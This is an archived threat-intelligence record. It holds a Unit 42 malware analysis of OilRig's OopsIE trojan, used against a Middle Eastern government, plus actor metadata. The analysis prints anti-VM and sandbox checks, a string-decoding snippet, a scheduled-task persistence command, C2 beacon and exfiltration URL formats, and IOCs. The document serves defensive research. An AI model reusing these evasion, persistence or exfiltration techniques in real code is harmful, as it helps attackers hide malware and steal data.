{
	"id": "48792266-675d-4b24-bd32-3b33f21418ba",
	"created_at": "2026-04-06T01:29:14.357991Z",
	"updated_at": "2026-04-10T03:37:36.976461Z",
	"deleted_at": null,
	"sha1_hash": "86bb5f74b7211dd06cd5d7ced5aff04cbafc94b1",
	"title": "OilRig targets a Middle Eastern Government and Adds Evasion Techniques to OopsIE",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 579130,
	"plain_text": "OilRig targets a Middle Eastern Government and Adds Evasion\r\nTechniques to OopsIE\r\nBy Robert Falcone, Bryan Lee, Riley Porter\r\nPublished: 2018-09-04 · Archived: 2026-04-06 01:07:49 UTC\r\nThe OilRig group maintains their persistent attacks against government entities in the Middle East region using\r\npreviously identified tools and tactics. As observed in previous attack campaigns, the tools used are not exact\r\nduplicates of those from the previous attack but instead are iterative variants. In this instance a spear phishing email was used\r\ncontaining a lure designed to socially engineer and entice the victim into executing a malicious attachment. The\r\nattachment was identified as a variant of the OopsIE trojan we identified in February 2018. In this iteration of\r\nOopsIE, the general functionality largely remained the same but contained the addition of anti-analysis and anti-virtual machine capabilities to further evade detection from automated defensive systems.\r\n  Attack Details\r\nIn July 2018, we reported on a wave of OilRig attacks delivering a tool called QUADAGENT involving a Middle\r\nEastern government agency. During that wave, we also observed OilRig leveraging additional compromised email\r\naccounts at the same government organization to send spear phishing emails delivering the OopsIE trojan as the\r\npayload instead of QUADAGENT. The OopsIE attack also targeted a government agency within the same nation\r\nstate, though a different organization than the one targeted with QUADAGENT. The email subject was in\r\nArabic, which translated to “Business continuity management training”. The email was sent to an address\r\nbelonging to a user group, rather than a specific individual’s email address. 
Based on open source data collection,\r\nit appears the targeted group had publicly published several documents regarding business continuity management\r\non the Internet, indicating the lures were purposefully crafted for this specific attack.\r\n  Evasion Techniques\r\nThe OopsIE variant delivered in this attack begins its execution by performing a series of anti-VM and sandbox\r\nchecks. If any of the checks described in Table 1 are successful, the Trojan will exit without running any of its\r\nfunctional code. These evasion techniques are meant to thwart automated analysis in an effort to avoid detection.\r\nTechnique Description\r\nFan Check\r\nThe Trojan will perform the following WMI query:\r\n  Select * from Win32_Fan\r\n  According to MSDN, this query should return a class that provides statistics on the CPU\r\nfan. The Trojan checks to see if the result of this query returned a class with more than 0\r\nelements, which would most likely be true in a non-virtual environment.\r\nhttps://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/\r\nPage 1 of 8\n\nTemperature\r\nCheck\r\nThe Trojan will perform the following WMI query:\r\n  SELECT * FROM MSAcpi_ThermalZoneTemperature\r\n  The Trojan will specifically attempt to get the CurrentTemperature value from this object\r\nand will check to see if the attempt results in an error that contains the word supported. 
This\r\nis meant to find the result of Not supported, which is the result if run in a virtual machine.\r\nMouse\r\nPointer\r\nCheck\r\nThe Trojan will perform the following WMI query:\r\n  Select * from Win32_PointingDevice\r\n  The Trojan will check the Caption, Description, HardwareType, InfSection, Manufacturer\r\nand Name fields in the results for the strings VMware, Virtual, VBox, VM or Oracle.\r\nHard Disk\r\nCheck\r\nThe Trojan will perform the following WMI query:\r\n  Select * from Win32_DiskDrive\r\n  The Trojan will check the Caption and Model fields in the results for the strings Virtual,\r\nVMWare, VM, VBox or Oracle.\r\nMotherboard\r\nCheck\r\nThe Trojan will perform the following WMI query:\r\n  Select * from Win32_BaseBoard\r\n  The Trojan will check the Manufacturer and Product fields in the results for the strings\r\nVMware, Virtual, VBox, VM or Oracle.\r\nSandboxie\r\nDLL Check\r\nThe Trojan will attempt to load the SbieDll.dll module via LoadLibrary.\r\nVBox DLL\r\nCheck\r\nThe Trojan checks to see if the file vboxmrxnp.dll exists in the system directory.\r\nVMware\r\nDLL Check\r\nThe Trojan checks to see if the files vmGuestLib.dll or vmbusres.dll exist in the system\r\ndirectory.\r\nTimezone\r\nCheck\r\nThe Trojan checks to see if the system is configured (“DaylightName”) with one of the\r\nfollowing time zones:\r\n  Arabic Daylight Time (UTC+3)\r\nArab Daylight Time (UTC+3)\r\nArabian Daylight Time (UTC+4)\r\nMiddle East Daylight Time (UTC+2)\r\nIran Daylight Time (UTC+3.5)\r\nHuman\r\nInteraction\r\nCheck\r\nBefore executing its functional code, the Trojan presents a dialog box with the following line\r\nof code:\r\n  Interaction.MsgBox(encodedStringClass.return_user32_bogus_errorcode_(3),\r\nMsgBoxStyle.Critical, null);\r\n  This dialog box displays An error occurred while processing 
user32.dll!, and the user\r\nmust click the OK button before the Trojan runs its functional code.\r\nTable 1 List of anti-VM and anti-sandbox techniques used by OopsIE\r\n  Most of these evasion techniques have been observed in other malware families; however, a few of the\r\ntechniques were more novel. First, we had not seen the CPU fan check used before, and upon testing the WMI\r\nquery in a VMware Windows 7 virtual machine we saw no result, as seen in Figure 1.\r\nFigure 1 WMI query for the Win32_Fan class on a VM returning no statistics\r\nHowever, when we ran the same query in a physical system running Windows 7, we saw the contents of the\r\nWin32_Fan class, as seen in Figure 2. The OopsIE payload checks to see if the result of this query has more than 0\r\nelements to determine if it is running on a virtual machine.\r\nFigure 2 WMI query for Win32_Fan run on a physical system showing statistics\r\nSecondly, the CPU temperature check seen in this payload was previously used by GravityRAT, as discussed\r\nearlier this year by security researchers at Talos. They noted that while virtual machines were detected by this\r\ntechnique, some physical systems were also detected as virtual machines because they did not support the WMI\r\nquery. This suggests that other WMI-based VM detection techniques may also detect certain physical systems if\r\nthose systems do not support the specific WMI query.\r\nThe last technique that was particularly interesting is the time zone check, as the Trojan will not execute its\r\nfunctional code if the system does not have a specific time zone set. 
The Trojan compares the\r\nTimeZone.CurrentTimeZone.DaylightName property to the strings Iran, Arab, Arabia and Middle East, which will\r\nmatch the following time zones in Windows:\r\n  Arabic Daylight Time (UTC+3)\r\nArab Daylight Time (UTC+3)\r\nArabian Daylight Time (UTC+4)\r\nMiddle East Daylight Time (UTC+2)\r\nIran Daylight Time (UTC+3.5)\r\nAccording to MSDN, these five time zones encompass 10 countries that fall within UTC+2, +3, +3.5 or +4 as\r\nseen in Figure 3. The fact that the Trojan will not operate on systems that are not configured with these time zones\r\nsuggests that this is a highly targeted attack focused on a specific subset of target nations.\r\nFigure 3 Countries in which OopsIE will run, based on the time zone\r\nNotable Differences\r\nThe OopsIE Trojan delivered in this attack had functional code that was very similar to the OopsIE variant\r\ndiscussed in our previous blog. The main similarities include the use of a scheduled task to persistently execute on\r\nthe system, as well as the same general process to communicate with its C2 server. For instance, this Trojan uses\r\nthe InternetExplorer application object much like the previous OopsIE Trojan and a very similar sequence of\r\nrequests to obtain commands. Also, this version of the Trojan inspects HTTP responses from the C2 server for the\r\ntags \u003cpre\u003e and \u003c/pre\u003e and will parse that data for commands.\r\nHowever, there are many differences introduced to this version of OopsIE from the previously discussed variant.\r\nAt face value, this current variant of OopsIE has the vast majority of its strings obfuscated, which can be\r\ndeobfuscated by splitting the strings using the hyphen as a delimiter, treating each split value as an integer,\r\nsubtracting one from each integer and converting each into a character. 
The following code snippet was used to\r\ndecode strings within OopsIE:\r\nout = \"\"\r\nfor e in obfuscated_string.split(\"-\"):\r\n   out += chr(int(e)-1)\r\nWhen first run, this OopsIE variant runs a variety of checks to avoid running in an analysis environment, as\r\ndiscussed in the previous section. The last check requires the user to click the ‘Ok’ button in an error dialog box,\r\nas seen in Figure 4.\r\nFigure 4 Error dialog box displayed by OopsIE\r\nAfter displaying the error dialog box, the Trojan will sleep for two seconds by running the following command\r\nthat runs the choice application. The use of the choice command, as seen below, did not appear in previous\r\nversions of OopsIE and appears to have been added in the most recent version used in this attack.\r\ncmd.exe /C choice /C Y /N /D Y /T 2 \u0026 Del\r\nAfter sleeping, the Trojan will create a GUID and write it to %APPDATA%\\Windows\\GDI.bin. It then moves\r\nitself to %APPDATA%\\Windows\\WindowsImplantment.exe and sets both of these files to have the hidden and\r\nsystem flags to hide them from the user.\r\nWith the Trojan moved to its final location, it will then create a scheduled task to run a VBScript to make sure it runs\r\npersistently. The Trojan accesses two resources, named Sch and VBS, which contain obfuscated strings holding\r\nthe command to create the scheduled task and the VBScript to run. The decoded string from the Sch resource is:\r\nSchTasks /Create /SC MINUTE /MO 3 /TN \"%n%\" /TR \"wscript %path%\" /f\r\nThe decoded string from the VBS resource is:\r\nCreateObject(\"WScript.Shell\").Run(\"%app%\")\r\nThe %n% string in the schtasks command above will be replaced with the GUID saved to GDI.bin. This differs\r\nfrom the previous OopsIE variant that used a hardcoded task name for the scheduled task. 
The %path% string in\r\nthe scheduled task command will be replaced with the path to the following:\r\n%APPDATA%\\Windows\\ShwDoc.VBS\r\nThe decoded string from the VBS resource is written to ShwDoc.VBS. The %app% string in the VBScript is\r\nreplaced with %APPDATA%\\Windows\\WindowsImplantment.exe. This process ultimately attempts to run the\r\nTrojan every three minutes, which is important as OopsIE relies on this scheduled task because it does not include a\r\nmain loop to continue its execution.\r\nAfter creating this scheduled task for persistence, the Trojan will begin communicating with its C2 server. The\r\nprocess in which the Trojan communicates with its C2 server is very similar to the previous OopsIE Trojan that we\r\ndiscussed in our previous blog. This particular sample uses the following domain as its C2 server:\r\nwww.windowspatch[.]com\r\nOne obvious difference between this version of OopsIE and the previously analyzed version is that the strings\r\nin the C2 URLs are reversed, from chk to khc, what to tahw and resp to pser. Also, the oops string used to signify\r\nan erroneous transmission from the C2, which gave OopsIE its name, is reversed to spoo. Also, this variant of\r\nOopsIE uses the output of the whoami command as the parameter within the URL when communicating with the\r\nC2 server, which differs from the previous OopsIE variant that used the hostname and username from the\r\nenvironment variables. The C2 communication begins with a beacon to the following URL:\r\nhxxp://www.windowspatch[.]com/khc?\u003chex(STDOUT of whoami command)\u003e\r\nIf the C2 server wishes to send a command, it will respond to the beacon above by echoing the whoami command\r\nresults sent by the Trojan to the C2 in the URL. 
If the Trojan receives this echo, it will create the following file\r\nthat the Trojan uses as a signal that it was able to successfully communicate with its C2 server:\r\n%APPDATA%\\Windows\\ShwDoc.srv\r\nIf the Trojan determines the C2 server wishes to send a command, it sends an HTTP request to the following URL:\r\nhxxp://www.windowspatch[.]com/tahw?\u003chex(STDOUT of whoami command)\u003e\r\nThe Trojan will first check the response to this request for the string spoo, which signifies the C2 does not wish to\r\nissue a command. Otherwise, the Trojan will attempt to parse the response for a command, specifically by\r\nsplitting the decoded response on \u003c\u003e and treating the text to the left of the \u003c\u003e string as the command and the text to the\r\nright as the command arguments. The command handler in this OopsIE variant is very similar to the previous\r\nversion, as it contains the same three (1, 2 and 3) commands seen in Table 2. The one difference in this command\r\nhandler from the previous version is the boom! command, which allows the actor to uninstall the OopsIE Trojan\r\nfrom the system.\r\nCommand Description\r\n1\r\nRuns a supplied command and writes its output to %APPDATA%\\SchWin.vbs, which will then\r\nbe uploaded to the C2 server.\r\n2\r\nDownloads a file to the system. 
Splits the argument on \"(|)\", with the string to the left representing\r\nthe filename to save and the string to the right representing the data to write to the file.\r\n3 Reads the specified file and uploads its contents to the C2 server.\r\nboom!\r\nDeletes the GID.bin, ShwDoc.VBS and ShwDoc.srv files, as well as the scheduled task whose\r\nname is the GUID stored in the GID.bin file.\r\nTable 2 OopsIE commands\r\nWhen sending data to the C2 server after running commands, the Trojan will use the following URL structure with\r\neither BBY or BBZ splitting the whoami output and the exfiltrated data:\r\nhttp://www.windowspatch.com/pser?\u003chex(STDOUT of whoami command)(BBZ|BBY)hex(up to 1000 bytes of\r\nhexadecimal data)\u003e\r\n  Conclusion\r\nThe OilRig group remains a persistent adversary in the Middle East region. They continue to iterate and add\r\ncapabilities to their tools while still functionally using the same tactics over and over again. Within the time frame\r\nwe have been tracking the OilRig group, they have repeatedly shown a willingness to add less commonly found\r\nfunctionality to their tools, such as their heavy use of DNS tunneling in their backdoors or adding authentication\r\nto their webshells. This attack is no different, now adding anti-analysis capabilities into their tools. This adversary\r\nis highly resourceful and continues to adapt over time. 
However, the tactics they continue to deploy are generally\r\nunsophisticated, and simple security hygiene would help organizations protect themselves against this threat.\r\nPalo Alto Networks customers are protected from this OilRig attack campaign and OopsIE by:\r\nAutoFocus customers can track this Trojan with the OopsIE tag\r\nAll known OopsIE samples are marked with malicious verdicts in WildFire\r\nAll known OopsIE C2 domains have DNS signatures and are classified as Command and Control\r\n \r\nIndicators of Compromise\r\nOopsIE Trojan\r\n36e66597a3ff808acf9b3ed9bc93a33a027678b1e262707682a2fd1de7731e23\r\n055b7607848777634b2b17a5c51da7949829ff88084c3cb30bcb3e58aae5d8e9\r\n6b240178eedba4ebc9f1c8b56bac02676ce896e609577f4fb64fa977d67c0761\r\n9e8ec04e534db1e714159cc68891be454c2459f179ab1df27d7f89d2b6793b17\r\nOopsIE C2\r\ndefender-update[.]com\r\nwindowspatch[.]com\r\nSource: https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/"
	],
	"report_names": [
		"unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie"
	],
	"threat_actors": [
		{
			"id": "cffb3c01-038f-4527-9cfd-57ad5a035c22",
			"created_at": "2022-10-25T15:50:23.38055Z",
			"updated_at": "2026-04-10T02:00:05.258283Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"COBALT GYPSY",
				"IRN2",
				"APT34",
				"Helix Kitten",
				"Evasive Serpens",
				"Hazel Sandstorm",
				"EUROPIUM",
				"ITG13",
				"Earth Simnavaz",
				"Crambus",
				"TA452"
			],
			"source_name": "MITRE:OilRig",
			"tools": [
				"ISMInjector",
				"ODAgent",
				"RDAT",
				"Systeminfo",
				"QUADAGENT",
				"OopsIE",
				"ngrok",
				"Tasklist",
				"certutil",
				"ZeroCleare",
				"POWRUNER",
				"netstat",
				"Solar",
				"ipconfig",
				"LaZagne",
				"BONDUPDATER",
				"SideTwist",
				"OilBooster",
				"SampleCheck5000",
				"PsExec",
				"SEASHARPEE",
				"Mimikatz",
				"PowerExchange",
				"OilCheck",
				"RGDoor",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "c786e025-c267-40bd-9491-328da70811a5",
			"created_at": "2025-08-07T02:03:24.736817Z",
			"updated_at": "2026-04-10T02:00:03.752071Z",
			"deleted_at": null,
			"main_name": "COBALT GYPSY",
			"aliases": [
				"APT34 ",
				"CHRYSENE ",
				"Crambus ",
				"EUROPIUM ",
				"Hazel Sandstorm ",
				"Helix Kitten ",
				"ITG13 ",
				"OilRig ",
				"Yellow Maero "
			],
			"source_name": "Secureworks:COBALT GYPSY",
			"tools": [
				"Glimpse",
				"Helminth",
				"Jason",
				"MacDownloader",
				"PoisonFrog",
				"RGDoor",
				"ThreeDollars",
				"TinyZbot",
				"Toxocara",
				"Trichuris",
				"TwoFace"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "67709937-2186-4a32-b64c-a5693d40ac77",
			"created_at": "2023-01-06T13:46:38.495593Z",
			"updated_at": "2026-04-10T02:00:02.999196Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"Crambus",
				"Helix Kitten",
				"APT34",
				"IRN2",
				"ATK40",
				"G0049",
				"EUROPIUM",
				"TA452",
				"Twisted Kitten",
				"Cobalt Gypsy",
				"APT 34",
				"Evasive Serpens",
				"Hazel Sandstorm",
				"Earth Simnavaz"
			],
			"source_name": "MISPGALAXY:OilRig",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b6436f7b-6012-4969-aed1-d440e2e8b238",
			"created_at": "2022-10-25T16:07:23.91517Z",
			"updated_at": "2026-04-10T02:00:04.788408Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"APT 34",
				"ATK 40",
				"Chrysene",
				"Cobalt Gypsy",
				"Crambus",
				"DEV-0861",
				"EUROPIUM",
				"Earth Simnavaz",
				"Evasive Serpens",
				"G0049",
				"Hazel Sandstorm",
				"Helix Kitten",
				"IRN2",
				"ITG13",
				"Scarred Manticore",
				"Storm-0861",
				"TA452",
				"Twisted Kitten",
				"UNC1860",
				"Yellow Maero"
			],
			"source_name": "ETDA:OilRig",
			"tools": [
				"AMATIAS",
				"Agent Drable",
				"Agent Injector",
				"AgentDrable",
				"Alma Communicator",
				"BONDUPDATER",
				"CACTUSPIPE",
				"Clayslide",
				"CypherRat",
				"DNSExfitrator",
				"DNSpionage",
				"DROPSHOT",
				"DistTrack",
				"DropperBackdoor",
				"Fox Panel",
				"GREYSTUFF",
				"GoogleDrive RAT",
				"HighShell",
				"HyperShell",
				"ISMAgent",
				"ISMDoor",
				"ISMInjector",
				"Jason",
				"Karkoff",
				"LIONTAIL",
				"LOLBAS",
				"LOLBins",
				"LONGWATCH",
				"LaZagne",
				"Living off the Land",
				"MailDropper",
				"Mimikatz",
				"MrPerfectInstaller",
				"OILYFACE",
				"OopsIE",
				"POWBAT",
				"POWRUNER",
				"Plink",
				"Poison Frog",
				"PowerExchange",
				"PsList",
				"PuTTY Link",
				"QUADAGENT",
				"RDAT",
				"RGDoor",
				"SEASHARPEE",
				"Saitama",
				"Saitama Backdoor",
				"Shamoon",
				"SideTwist",
				"SpyNote",
				"SpyNote RAT",
				"StoneDrill",
				"TONEDEAF",
				"TONEDEAF 2.0",
				"ThreeDollars",
				"TwoFace",
				"VALUEVAULT",
				"Webmask",
				"WinRAR",
				"ZEROCLEAR",
				"ZeroCleare",
				"certutil",
				"certutil.exe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775438954,
	"ts_updated_at": 1775792256,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/86bb5f74b7211dd06cd5d7ced5aff04cbafc94b1.pdf",
		"text": "https://archive.orkl.eu/86bb5f74b7211dd06cd5d7ced5aff04cbafc94b1.txt",
		"img": "https://archive.orkl.eu/86bb5f74b7211dd06cd5d7ced5aff04cbafc94b1.jpg"
	}
}